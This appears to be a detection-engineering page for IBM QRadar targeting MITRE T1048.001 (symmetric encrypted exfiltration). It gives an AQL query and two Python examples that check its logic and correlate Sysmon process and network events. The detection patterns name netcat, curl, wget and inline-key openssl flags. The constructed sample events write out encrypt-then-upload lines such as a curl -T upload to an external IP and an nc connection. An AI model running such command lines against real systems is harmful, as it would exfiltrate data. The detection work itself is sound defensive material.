
Detect Exfiltration Over Symmetric Encrypted Non-C2 Protocol in IBM QRadar

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. Symmetric encryption algorithms (RC4, AES, ChaCha20, Blowfish) use shared keys on both ends of the channel. Attackers may implement custom encryption over protocols not natively encrypted (HTTP, FTP, DNS) or add extra encryption layers over already-encrypted protocols (HTTPS, SFTP) to obscure data contents from network inspection tools. This technique is distinguished from asymmetric exfiltration by the pre-shared key requirement, often resulting in artifacts such as key material embedded in scripts, configuration files, or command-line arguments.

MITRE ATT&CK

Tactic
Exfiltration
Technique
T1048 Exfiltration Over Alternative Protocol
Sub-technique
T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Canonical reference
https://attack.mitre.org/techniques/T1048/001/

QRadar Detection Query

IBM QRadar (QRadar), AQL:
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  destinationip,
  destinationport,
  username,
  QIDNAME(qid) AS event_name,
  "ProcessName" AS process_name,
  "CommandLine" AS command_line,
  LONG("BytesSent") AS bytes_sent,
  LOGSOURCETYPENAME(devicetype) AS log_source_type,
  CASE
    WHEN "CommandLine" ILIKE '%aes%'     THEN 'AES'
    WHEN "CommandLine" ILIKE '%rc4%'
      OR "CommandLine" ILIKE '%arcfour%' THEN 'RC4'
    WHEN "CommandLine" ILIKE '%chacha%'  THEN 'ChaCha20'
    WHEN "CommandLine" ILIKE '%des%'     THEN 'DES'
    ELSE 'Unknown'
  END AS encryption_algo,
  CASE
    WHEN "CommandLine" ILIKE '%-nosalt%' THEN 'true'
    ELSE 'false'
  END AS has_nosalt,
  CASE
    WHEN "CommandLine" ILIKE '%-pass pass:%'
      OR "CommandLine" ILIKE '%-k %'
      OR "CommandLine" ILIKE '%-passout%'
      OR "CommandLine" ILIKE '%-passin%' THEN 'true'
    ELSE 'false'
  END AS has_key_material
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN (
    'Microsoft Windows Security Event Log',
    'Sysmon',
    'Linux OS',
    'Universal DSM',
    'SNARE for Windows'
  )
  AND (
    ("ProcessName" ILIKE '%openssl%' OR "ProcessName" ILIKE '%ccrypt%'
      OR "ProcessName" ILIKE '%mcrypt%' OR "ProcessName" ILIKE '%cryptcat%'
      OR "ProcessName" ILIKE '%aescrypt%' OR "ProcessName" ILIKE '%gpg%')
    OR
    ("ProcessName" ILIKE '%python%' AND (
      "CommandLine" ILIKE '%AES%' OR "CommandLine" ILIKE '%RC4%'
      OR "CommandLine" ILIKE '%encrypt%' OR "CommandLine" ILIKE '%socket%'
      OR "CommandLine" ILIKE '%Cipher%'
    ))
  )
  AND (
    "CommandLine" ILIKE '%enc -aes%'  OR "CommandLine" ILIKE '%-aes-256%'
    OR "CommandLine" ILIKE '%aes256%' OR "CommandLine" ILIKE '%aes128%'
    OR "CommandLine" ILIKE '%enc -rc4%' OR "CommandLine" ILIKE '%-rc4%'
    OR "CommandLine" ILIKE '%arcfour%' OR "CommandLine" ILIKE '%chacha20%'
    OR "CommandLine" ILIKE '%-nosalt%' OR "CommandLine" ILIKE '%-pass pass:%'
    OR "CommandLine" ILIKE '%-passout%' OR "CommandLine" ILIKE '%-passin%'
    OR "CommandLine" ILIKE '%-k %'
  )
  AND (
    "CommandLine" ILIKE '%-connect%' OR "CommandLine" ILIKE '%socket%'
    OR "CommandLine" ILIKE '%netcat%'  OR "CommandLine" ILIKE '%http%'
    OR "CommandLine" ILIKE '%curl%'    OR "CommandLine" ILIKE '%wget%'
    OR "CommandLine" ILIKE '%ftp%'     OR "CommandLine" ILIKE '%tcp%'
  )
  AND NOT (
    destinationip INSUBNET '10.0.0.0/8'
    OR destinationip INSUBNET '172.16.0.0/12'
    OR destinationip INSUBNET '192.168.0.0/16'
    OR destinationip INSUBNET '127.0.0.0/8'
    OR destinationip IS NULL
  )
  AND starttime > NOW() - 86400000
ORDER BY starttime DESC
Severity: high · Confidence: medium

AQL query that detects process events in which a symmetric encryption tool (openssl, ccrypt, mcrypt, cryptcat, gpg, aescrypt), or a Python interpreter whose command line mentions AES, RC4, encrypt, socket or Cipher, is invoked with cipher-specific arguments together with a network-connectivity indicator, and the event's destination lies outside private and loopback address space. The query applies case-insensitive ILIKE substring matching across ProcessName and CommandLine to surface AES/RC4/ChaCha20 encryption combined with network exfiltration indicators, and adds inline CASE classification of the encryption algorithm, the -nosalt flag and the presence of key material for analyst triage.
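To check the query's logic without a QRadar instance, here is an added Python re-implementation of its WHERE predicate and CASE expressions over constructed process events; it is example code written for this page, not the page's own query and nothing shipped by IBM. The ProcessEvent fields are assumed to map to the query's "ProcessName", "CommandLine" and destinationip columns, the sample command lines and addresses are constructed, and EXAMPLE_KEY stands in for any inline key.

```python
"""Offline mirror of the AQL predicate above (added example, not the page's
or IBM's code). Each constructed record is tested the way the WHERE clause
and CASE expressions test one QRadar event."""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, Optional

# Tool names from the ProcessName clause of the query
CRYPTO_TOOLS = ("openssl", "ccrypt", "mcrypt", "cryptcat", "aescrypt", "gpg")
# Strings that let a python process count as a crypto tool
PYTHON_HINTS = ("aes", "rc4", "encrypt", "socket", "cipher")
# Cipher / key-material arguments (second AND group); "-k " keeps its space
CIPHER_ARGS = ("enc -aes", "-aes-256", "aes256", "aes128", "enc -rc4", "-rc4",
               "arcfour", "chacha20", "-nosalt", "-pass pass:", "-passout",
               "-passin", "-k ")
# Network indicators (third AND group)
NETWORK_HINTS = ("-connect", "socket", "netcat", "http", "curl", "wget", "ftp", "tcp")
# Destinations the query drops with INSUBNET
EXCLUDED_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass
class ProcessEvent:
    process_name: str          # assumed mapping: "ProcessName"
    command_line: str          # assumed mapping: "CommandLine"
    destination_ip: Optional[str]  # None models destinationip IS NULL


def ilike_any(text: str, needles: Iterable[str]) -> bool:
    """ILIKE '%needle%' is a case-insensitive substring test."""
    lowered = text.lower()
    return any(n.lower() in lowered for n in needles)


def classify_algorithm(cmd: str) -> str:
    """Mirror of the encryption_algo CASE expression (first match wins)."""
    if ilike_any(cmd, ("aes",)):
        return "AES"
    if ilike_any(cmd, ("rc4", "arcfour")):
        return "RC4"
    if ilike_any(cmd, ("chacha",)):
        return "ChaCha20"
    if ilike_any(cmd, ("des",)):
        return "DES"
    return "Unknown"


def has_key_material(cmd: str) -> bool:
    return ilike_any(cmd, ("-pass pass:", "-k ", "-passout", "-passin"))


def destination_excluded(ip: Optional[str]) -> bool:
    """AND NOT (... INSUBNET ... OR destinationip IS NULL)."""
    if ip is None:
        return True
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in EXCLUDED_NETS)


def matches(ev: ProcessEvent) -> bool:
    is_tool = ilike_any(ev.process_name, CRYPTO_TOOLS) or (
        "python" in ev.process_name.lower()
        and ilike_any(ev.command_line, PYTHON_HINTS))
    return (is_tool
            and ilike_any(ev.command_line, CIPHER_ARGS)
            and ilike_any(ev.command_line, NETWORK_HINTS)
            and not destination_excluded(ev.destination_ip))


def evaluate(events: Iterable[ProcessEvent]) -> list:
    """Return the SELECT-style row for every event the predicate accepts."""
    return [{"process": ev.process_name,
             "encryption_algo": classify_algorithm(ev.command_line),
             "has_nosalt": ilike_any(ev.command_line, ("-nosalt",)),
             "has_key_material": has_key_material(ev.command_line),
             "destination": ev.destination_ip}
            for ev in events if matches(ev)]


# Constructed sample telemetry (not real data), with the peer address populated
# as a source that records command line and destination in one event would.
SAMPLE_EVENTS = [
    # 1: AES, -nosalt and an inline key; "ftp" in the input path satisfies the
    #    network group, which shows how loose the substring test is
    ProcessEvent("/usr/bin/openssl",
                 "openssl enc -aes-256-cbc -nosalt -k EXAMPLE_KEY "
                 "-in /srv/ftp/export.tar -out /tmp/export.enc", "203.0.113.25"),
    # 2: python helper with an RC4 alias and a socket flag, public peer
    ProcessEvent("/usr/bin/python3",
                 "python3 push.py --cipher arcfour --socket 203.0.113.25:9001",
                 "203.0.113.25"),
    # 3: same as 1, but the peer is in 192.168.0.0/16, so the query drops it
    ProcessEvent("/usr/bin/openssl",
                 "openssl enc -aes-256-cbc -nosalt -k EXAMPLE_KEY "
                 "-in /srv/ftp/export.tar -out /tmp/export.enc", "192.168.1.200"),
    # 4: CSR generation from the tuning list: key material, no network hint
    ProcessEvent("/usr/bin/openssl",
                 "openssl req -new -key server.key -out server.csr -passin pass:EXAMPLE",
                 "203.0.113.25"),
]

if __name__ == "__main__":
    for row in evaluate(SAMPLE_EVENTS):
        print(row)
```

Two properties of the query stand out when the samples run. Every AND group must be satisfied by the same event, so an openssl invocation whose command line names no network target (the usual shape when encryption and upload are separate processes) does not match, while an unrelated path component such as /srv/ftp/ does. And because the predicate also requires a non-null destination outside private space, a Sysmon process-create record (Event ID 1, which carries CommandLine but no peer address) or a lab peer such as 192.168.1.200 is not returned; the query needs a source that populates both fields in one event, or a correlated feed.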

Data Sources

  • QRadar SIEM with Windows Security Event Log DSM
  • Sysmon for Windows (process create / network connect events)
  • Linux OS DSM (auditd or syslog process tracking)
  • Universal DSM for generic endpoint process telemetry

Required Tables

events

False Positives & Tuning

  • Authorized openssl invocations for TLS certificate signing, CSR generation, or OCSP stapling against public PKI infrastructure
  • Python-based ETL or ML pipelines using AES-encrypted communication with cloud data warehouses or APIs
  • Security orchestration playbooks calling encryption utilities during automated incident response or data sanitization
  • Legitimate ccrypt or gpg file encryption followed by SFTP/FTPS upload to authorized external storage providers
Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Exfiltrate File Using OpenSSL AES Encryption over HTTP

    Expected signal: Sysmon Event ID 1: Process Create for openssl with CommandLine containing 'enc -aes-256-cbc -nosalt -k' and the key material. Sysmon Event ID 1: Process Create for curl with destination URL. Sysmon Event ID 3: Network connection from curl to destination IP:8080. Sysmon Event ID 11: File Create for /tmp/exfil_payload.enc. Auditd records showing execve syscalls for openssl and curl with full argument lists.

  2. Test 2: Symmetric Encrypted Exfiltration via Python Script with RC4

    Expected signal: Sysmon Event ID 1: Process Create for python3 with CommandLine containing 'rc4', 'socket', 'encrypt', and 'connect'. Sysmon Event ID 3: Network connection from python3 to 192.168.1.200:9001 (non-standard port, high-confidence exfiltration indicator). Auditd execve syscall with full Python -c command argument.

  3. Test 3: OpenSSL Encrypted Data Transfer via Named Pipe to Netcat

    Expected signal: Sysmon Event ID 1: Process Create for openssl with '-aes-256-cbc -k <key> -nosalt' in CommandLine. Sysmon Event ID 1: Process Create for nc targeting 192.168.1.200:4444 (classic reverse shell port). Sysmon Event ID 3: Network connection from nc to external IP on port 4444. Possible Sysmon Event ID 1 for tar as parent/sibling process. Linux auditd: execve records for all three commands (tar, openssl, nc).

  4. Test 4: Exfiltration via OpenSSL s_client Over HTTPS Port with Symmetric Key

    Expected signal: Sysmon Event ID 1: First openssl process with 'enc -aes-256-cbc -k TeamPreSharedKey99 -nosalt' in CommandLine. Sysmon Event ID 1: Second openssl process with 's_client -connect 192.168.1.200:443' in CommandLine. Sysmon Event ID 3: Network connection from openssl s_client to port 443. Sysmon Event ID 11: File Create for /tmp/inner_encrypted.bin. The double-process pattern (enc then s_client) is highly distinctive.
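The expected signals above pair a process-create record for the encrypting tool with a later network-connect record from a sibling process (curl, nc or a second openssl). The following added Python example, which is not part of the page and not part of Sysmon or QRadar, shows one way to join the two on Sysmon's own field names; it assumes the encrypting and the uploading process share a ParentProcessGuid (the shell or script that launched them), a 120-second window, and constructed events with placeholder GUIDs, times and an EXAMPLE_KEY.

```python
"""Correlate Sysmon Event ID 1 (process create) with Event ID 3 (network
connect) for the multi-process pattern described in the tests above.
Added example, not the page's own code. Events are plain dicts keyed by
Sysmon field names; GUIDs, timestamps and the key are constructed."""
import ipaddress
from datetime import datetime, timedelta

# Symmetric-cipher and key-material tokens taken from the query above
CIPHER_TOKENS = ("-aes-", "aes256", "aes128", "-rc4", "arcfour", "chacha20")
KEY_TOKENS = ("-k ", "-pass pass:", "-passin", "-passout", "-nosalt")
# Same exclusions the query applies with INSUBNET (explicit, so that
# documentation ranges such as 203.0.113.0/24 still count as external)
EXCLUDED_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
WINDOW = timedelta(seconds=120)  # assumed maximum gap between encrypt and connect


def parse_utc(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in EXCLUDED_NETS)


def is_symmetric_encrypt(cmd: str) -> bool:
    """Command line names a symmetric cipher and supplies key material inline."""
    c = cmd.lower()
    return any(t in c for t in CIPHER_TOKENS) and any(t in c for t in KEY_TOKENS)


def correlate(events):
    """One hit per encrypting process that has a sibling connection to an
    external peer inside WINDOW after the encrypting process started."""
    creates = [e for e in events if e["EventID"] == 1]
    connects = [e for e in events if e["EventID"] == 3]
    by_guid = {e["ProcessGuid"]: e for e in creates}  # EID 3 has no parent GUID
    hits = []
    for enc in creates:
        if not is_symmetric_encrypt(enc["CommandLine"]):
            continue
        t0 = parse_utc(enc["UtcTime"])
        for conn in connects:
            proc = by_guid.get(conn["ProcessGuid"])
            if proc is None or proc["ParentProcessGuid"] != enc["ParentProcessGuid"]:
                continue
            gap = parse_utc(conn["UtcTime"]) - t0
            if timedelta(0) <= gap <= WINDOW and is_external(conn["DestinationIp"]):
                hits.append({
                    "encrypt_guid": enc["ProcessGuid"],
                    "encrypt_cmdline": enc["CommandLine"],
                    "network_image": proc["Image"],
                    "destination": f'{conn["DestinationIp"]}:{conn["DestinationPort"]}',
                    "gap_seconds": gap.total_seconds(),
                })
    return hits


# Constructed Sysmon-style telemetry (placeholder GUIDs, not real data)
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2024-01-01 10:00:00.000", "ProcessGuid": "{ENC-1}",
     "ParentProcessGuid": "{SHELL-1}", "Image": "/usr/bin/openssl",
     "CommandLine": "openssl enc -aes-256-cbc -nosalt -k EXAMPLE_KEY "
                    "-in /tmp/docs.tar -out /tmp/docs.enc"},
    {"EventID": 1, "UtcTime": "2024-01-01 10:00:01.500", "ProcessGuid": "{NET-1}",
     "ParentProcessGuid": "{SHELL-1}", "Image": "/usr/bin/curl",
     "CommandLine": "curl -T /tmp/docs.enc http://203.0.113.25:8080/upload"},
    {"EventID": 3, "UtcTime": "2024-01-01 10:00:01.800", "ProcessGuid": "{NET-1}",
     "Image": "/usr/bin/curl", "DestinationIp": "203.0.113.25", "DestinationPort": 8080},
    # Lab-style peer on a private address: dropped, as the query would drop it
    {"EventID": 1, "UtcTime": "2024-01-01 10:00:03.000", "ProcessGuid": "{NET-2}",
     "ParentProcessGuid": "{SHELL-1}", "Image": "/usr/bin/nc",
     "CommandLine": "nc 192.168.1.200 4444"},
    {"EventID": 3, "UtcTime": "2024-01-01 10:00:03.200", "ProcessGuid": "{NET-2}",
     "Image": "/usr/bin/nc", "DestinationIp": "192.168.1.200", "DestinationPort": 4444},
    # Scheduled local backup under a different parent, no network sibling
    {"EventID": 1, "UtcTime": "2024-01-01 10:05:00.000", "ProcessGuid": "{ENC-2}",
     "ParentProcessGuid": "{CRON-1}", "Image": "/usr/bin/openssl",
     "CommandLine": "openssl enc -aes-256-cbc -pass pass:EXAMPLE "
                    "-in /var/backups/db.sql -out /var/backups/db.enc"},
]

if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print(hit)
```

Joining on ParentProcessGuid is what makes Test 1 (openssl then curl), Test 3 (tar, openssl, nc) and Test 4 (enc then s_client) visible as one event chain rather than three unrelated process starts; the window and the parent-based join are assumptions to tune against the environment, and a destination in 192.168.0.0/16 is dropped here exactly as the query's INSUBNET exclusion would drop it, which matters when the test harness targets a private lab host.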
